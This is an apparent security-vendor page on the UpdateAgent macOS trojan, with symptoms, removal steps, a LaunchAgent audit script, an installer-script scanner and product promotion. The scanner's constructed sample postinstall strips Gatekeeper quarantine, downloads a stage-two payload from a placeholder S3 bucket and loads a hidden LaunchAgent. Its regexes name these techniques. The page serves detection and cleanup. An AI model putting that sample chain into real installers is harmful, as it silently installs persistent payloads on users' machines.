UpdateAgent is a trojan targeting macOS, first discovered in 2020.
Also known as: OSX.UpdateAgent, WizardUpdate, Silver Toucan
UpdateAgent is a macOS trojan that has evolved significantly since its discovery, gaining the ability to bypass macOS Gatekeeper protections. It masquerades as legitimate software such as video apps or support agents and tricks users into installing it. Once active, UpdateAgent can deploy additional malware payloads including adware like Adload, harvest system information, and modify the LaunchAgent folder for persistence. Microsoft's threat intelligence team tracked its evolution across multiple versions, each adding more sophisticated evasion techniques including the ability to abuse legitimate cloud services for payload hosting.
How UpdateAgent Spreads
Drive-by downloads from malicious or compromised websites disguised as legitimate application updates
Fake software installers for video tools, productivity apps, and tech support utilities
Malvertising campaigns on popular websites that redirect to trojanized download pages
Bundled with legitimate-looking .pkg installers that use preinstall and postinstall scripts to deploy the trojan
Symptoms of Infection
Unexpected adware or browser hijacking appearing after installing a new application
New LaunchAgent plist files in ~/Library/LaunchAgents/ with random or unfamiliar names
Outbound network connections to Amazon S3, CloudFront, or other cloud storage services downloading unknown payloads
System Preferences showing new configuration profiles you did not install
Removal Steps
Check /Applications/ and ~/Downloads/ for recently installed unfamiliar applications. Delete any apps you don't recognize or that you installed just before symptoms appeared.
In Terminal, list LaunchAgents with ls -la ~/Library/LaunchAgents/ and ls -la /Library/LaunchAgents/. Delete any plist files with random names or that reference unfamiliar executables. To inspect the ProgramArguments key of a suspicious plist, run: plutil -p <filename>.plist
Go to System Settings > Privacy & Security > Profiles (or System Preferences > Profiles on older macOS). Remove any profiles you did not install. UpdateAgent can install profiles to enforce browser or proxy settings.
UpdateAgent frequently deploys Adload as a secondary payload. Check for Adload persistence: look for files in /Library/Application Support/ with random folder names and browser extensions you did not install.
Remove unfamiliar browser extensions from Safari (Settings > Extensions), Chrome (chrome://extensions), and Firefox (about:addons). Reset homepage and search engine if they were changed.
Run a full CoreLock scan to detect UpdateAgent components, any secondary payloads it deployed, and residual persistence mechanisms that manual cleanup may have missed.
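The LaunchAgents check in the removal steps above can be scripted. The following is an added example, not CoreLock's code: it reads every plist in the two LaunchAgents folders with Python's standard plistlib (the same data plutil -p prints) and reports entries whose executable lives outside common system or application locations, whose program is a shell or script interpreter, whose arguments touch the quarantine attribute, or whose label looks machine-generated. The trusted-path list, the interpreter list and the random-label heuristic are assumptions chosen for illustration.

```python
"""Audit LaunchAgent plists for UpdateAgent-style persistence.

Added example, not CoreLock's code. Reads every .plist in the user and
system LaunchAgents folders with the standard library and reports the
ones that look out of place. TRUSTED_PREFIXES, SCRIPT_INTERPRETERS and
looks_random() are assumptions made for illustration.
"""
import os
import plistlib
import re
from pathlib import Path
from typing import Dict, List, Optional

LAUNCH_AGENT_DIRS = [
    Path.home() / "Library" / "LaunchAgents",
    Path("/Library/LaunchAgents"),
]

# Where a legitimate agent's executable normally lives (assumption).
TRUSTED_PREFIXES = ("/System/", "/usr/", "/bin/", "/sbin/",
                    "/Applications/", "/Library/Apple/")

# An agent whose "program" is an interpreter is really running an inline
# script or a fetch command; worth a look even when the path is trusted.
SCRIPT_INTERPRETERS = {"sh", "bash", "zsh", "osascript", "curl", "python3", "perl"}


def program_path(plist: dict) -> Optional[str]:
    """Executable the agent launches: ProgramArguments[0] or Program."""
    args = plist.get("ProgramArguments")
    if isinstance(args, list) and args:
        return str(args[0])
    prog = plist.get("Program")
    return str(prog) if prog else None


def looks_random(label: str) -> bool:
    """Heuristic: a dotted component of 10+ chars mixing letters and digits."""
    for part in label.split("."):
        if len(part) >= 10 and re.search(r"[0-9]", part) and re.search(r"[a-z]", part):
            return True
    return False


def suspicious_reasons(plist: dict) -> List[str]:
    """Return human-readable reasons this agent deserves review (empty if none)."""
    reasons: List[str] = []
    path = program_path(plist)
    if path is None:
        reasons.append("no Program or ProgramArguments key")
    else:
        if not path.startswith(TRUSTED_PREFIXES):
            reasons.append(f"executable outside trusted locations: {path}")
        if os.path.basename(path) in SCRIPT_INTERPRETERS:
            reasons.append(f"agent runs an interpreter: {path}")
    args = plist.get("ProgramArguments")
    joined = " ".join(map(str, args)) if isinstance(args, list) else ""
    if "com.apple.quarantine" in joined or "xattr" in joined:
        reasons.append("arguments manipulate the quarantine attribute")
    label = str(plist.get("Label", ""))
    if looks_random(label):
        reasons.append(f"label looks machine-generated: {label}")
    return reasons


def audit_plist(path: Path) -> List[str]:
    """Parse one plist (binary or XML) and evaluate it."""
    try:
        with open(path, "rb") as fh:
            plist = plistlib.load(fh)
    except Exception as exc:  # an unreadable plist in this folder is itself notable
        return [f"unparseable plist: {exc}"]
    if not isinstance(plist, dict):
        return ["top-level object is not a dictionary"]
    return suspicious_reasons(plist)


def audit_directories(dirs=LAUNCH_AGENT_DIRS) -> Dict[str, List[str]]:
    """Map each flagged plist path to its list of reasons."""
    findings: Dict[str, List[str]] = {}
    for d in dirs:
        if not Path(d).is_dir():
            continue
        for p in sorted(Path(d).glob("*.plist")):
            reasons = audit_plist(p)
            if reasons:
                findings[str(p)] = reasons
    return findings


if __name__ == "__main__":
    findings = audit_directories()
    if not findings:
        print("No suspicious LaunchAgents found.")
    for path, reasons in findings.items():
        print(path)
        for reason in reasons:
            print("  -", reason)
```

Run it with python3 on the Mac being cleaned; anything it lists still needs a human to confirm, since a few legitimate vendors ship agents that run from ~/Library/Application Support.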
Prevention
Only download software from the Mac App Store or verified developer websites
Be skeptical of applications that require you to right-click and Open to bypass Gatekeeper warnings
Keep macOS updated — Apple continuously improves Gatekeeper and XProtect to detect UpdateAgent variants
Use CoreLock to monitor for Gatekeeper bypass attempts and unauthorized payload downloads from cloud services
Real-time Detection
CoreLock detects UpdateAgent by monitoring for Gatekeeper bypass techniques, flagging preinstall and postinstall scripts in .pkg installers that execute suspicious commands, identifying outbound connections to cloud storage services used for secondary payload delivery, and applying YARA rules matching known UpdateAgent binary patterns across its multiple evolution stages.
Frequently Asked Questions
UpdateAgent evolved to bypass Gatekeeper by removing the quarantine attribute from downloaded files using the xattr -d com.apple.quarantine command in its installer scripts. This prevents macOS from showing the standard security warning when users open downloaded applications. Some variants also exploit .pkg installer scripts that execute with elevated privileges before Gatekeeper checks are applied.
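The Real-time Detection section and this answer both point at the same artifact: the preinstall/postinstall scripts inside a .pkg. The following is an added example (not CoreLock's code or signatures) that scans such scripts for the quarantine-attribute removal described here, for payload downloads from the cloud hosts named on this page, and for LaunchAgent installation, then summarises the hits into a triage verdict. The rule patterns, the severity mapping and SAMPLE_POSTINSTALL are all constructed assumptions.

```python
"""Scan .pkg preinstall/postinstall scripts for Gatekeeper-bypass and
payload-staging behaviour.

Added example, not CoreLock's code. The rules are regexes written to match
the behaviours the page describes (stripping com.apple.quarantine, fetching
a second stage from cloud storage, installing a LaunchAgent) plus a few
related indicators; they are illustrative assumptions, not CoreLock's
signatures. SAMPLE_POSTINSTALL is a constructed input.
"""
import re
from pathlib import Path
from typing import Dict, List, Tuple

Hit = Tuple[int, str, str]  # (line number, rule name, offending line)

RULES: List[Tuple[str, re.Pattern]] = [
    # xattr -d com.apple.quarantine <path>, or xattr -c / -rc <path>
    ("quarantine-strip",
     re.compile(r"xattr\s+(?:-\w+\s+)*(?:-d\s+com\.apple\.quarantine|-\w*c\b)")),
    # switching Gatekeeper off or whitelisting a path
    ("gatekeeper-disable", re.compile(r"spctl\s+--(?:master-disable|global-disable|add)\b")),
    # downloading a second stage, including from the cloud hosts named on the page
    ("remote-fetch",
     re.compile(r"\b(?:curl|wget)\b.*(?:https?://|s3\.amazonaws\.com|cloudfront\.net)")),
    # dropping or loading a per-user / system LaunchAgent
    ("launchagent-install",
     re.compile(r"launchctl\s+(?:load|bootstrap)\b|Library/LaunchAgents")),
    # decoding an embedded blob before running it
    ("decode-then-exec", re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b")),
    # making a freshly dropped temp file executable
    ("chmod-exec-tmp", re.compile(r"chmod\s+\+x\s+(?:/private)?/(?:var/)?tmp/")),
]


def scan_script(text: str) -> List[Hit]:
    """Run every rule over each non-comment line of a script."""
    hits: List[Hit] = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue  # blank lines and comments (incl. the shebang) never execute
        for name, pattern in RULES:
            if pattern.search(stripped):
                hits.append((lineno, name, stripped))
    return hits


def verdict(hits: List[Hit]) -> str:
    """Collapse hits into none/low/medium/high for triage (assumed mapping)."""
    names = {name for _, name, _ in hits}
    if not names:
        return "none"
    if names & {"quarantine-strip", "gatekeeper-disable"}:
        return "high"    # direct tampering with Gatekeeper
    if "remote-fetch" in names and names & {"launchagent-install", "decode-then-exec", "chmod-exec-tmp"}:
        return "medium"  # fetches something and stages or persists it
    return "low"


def scan_package_scripts(scripts_dir: Path) -> Dict[str, List[Hit]]:
    """Scan every installer script below a directory of expanded .pkg contents.

    On macOS, `pkgutil --expand-full pkg.pkg outdir` (assumed here, not part of
    the example) writes the scripts out as plain files; this function simply
    walks whatever directory it is given.
    """
    results: Dict[str, List[Hit]] = {}
    for p in sorted(Path(scripts_dir).rglob("*")):
        if p.is_file() and p.name in {"preinstall", "postinstall", "preflight", "postflight"}:
            hits = scan_script(p.read_text(errors="replace"))
            if hits:
                results[str(p.relative_to(scripts_dir))] = hits
    return results


SAMPLE_POSTINSTALL = """\
#!/bin/sh
# Constructed sample modelled on the installer behaviour described on the page.
APP="/Applications/VideoPlayer.app"
xattr -d com.apple.quarantine "$APP"
curl -s "https://example-bucket.s3.amazonaws.com/stage2" -o "$HOME/Library/Application Support/.stage2"
cp agent.plist "$HOME/Library/LaunchAgents/com.k8s2hd9qzx1.agent.plist"
launchctl load "$HOME/Library/LaunchAgents/com.k8s2hd9qzx1.agent.plist"
"""

if __name__ == "__main__":
    sample_hits = scan_script(SAMPLE_POSTINSTALL)
    for lineno, rule, line in sample_hits:
        print(f"line {lineno:>2}  {rule:<20}  {line}")
    print("verdict:", verdict(sample_hits))
```

Comment lines are skipped on purpose so that a script documenting what it does not do cannot trip the scanner; a "low" verdict on a lone launchctl load is expected, since plenty of legitimate installers register a helper agent, and it is the combination with a quarantine strip or a remote fetch that separates UpdateAgent-style installers from ordinary ones.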
Signs include unexpected adware appearing on your Mac, unfamiliar browser extensions, new configuration profiles in System Settings, and unknown LaunchAgent files. If you recently installed an app and then started seeing ads, pop-ups, or browser hijacking, UpdateAgent may have installed adware like Adload as a secondary payload. Check Activity Monitor for unfamiliar processes and run a CoreLock scan.
UpdateAgent primarily deploys adware payloads, with Adload being the most common secondary payload. It downloads these payloads from legitimate cloud services like Amazon S3 and CloudFront, making network-based detection harder. Some variants have also deployed browser hijackers and data collection tools. The modular design means new payloads can be swapped in by the operators.
No. UpdateAgent has no connection to Apple's legitimate macOS Software Update mechanism. The name refers to the malware's strategy of disguising itself as an update utility. Legitimate macOS updates only come through System Settings > Software Update or the Mac App Store. Any application claiming to be a system update downloaded from a website is suspicious.
Download CoreLock to detect and remove UpdateAgent and other macOS threats. AI-powered analysis, real-time monitoring, and one-click remediation.
Download CoreLock Free. Available for macOS and Windows.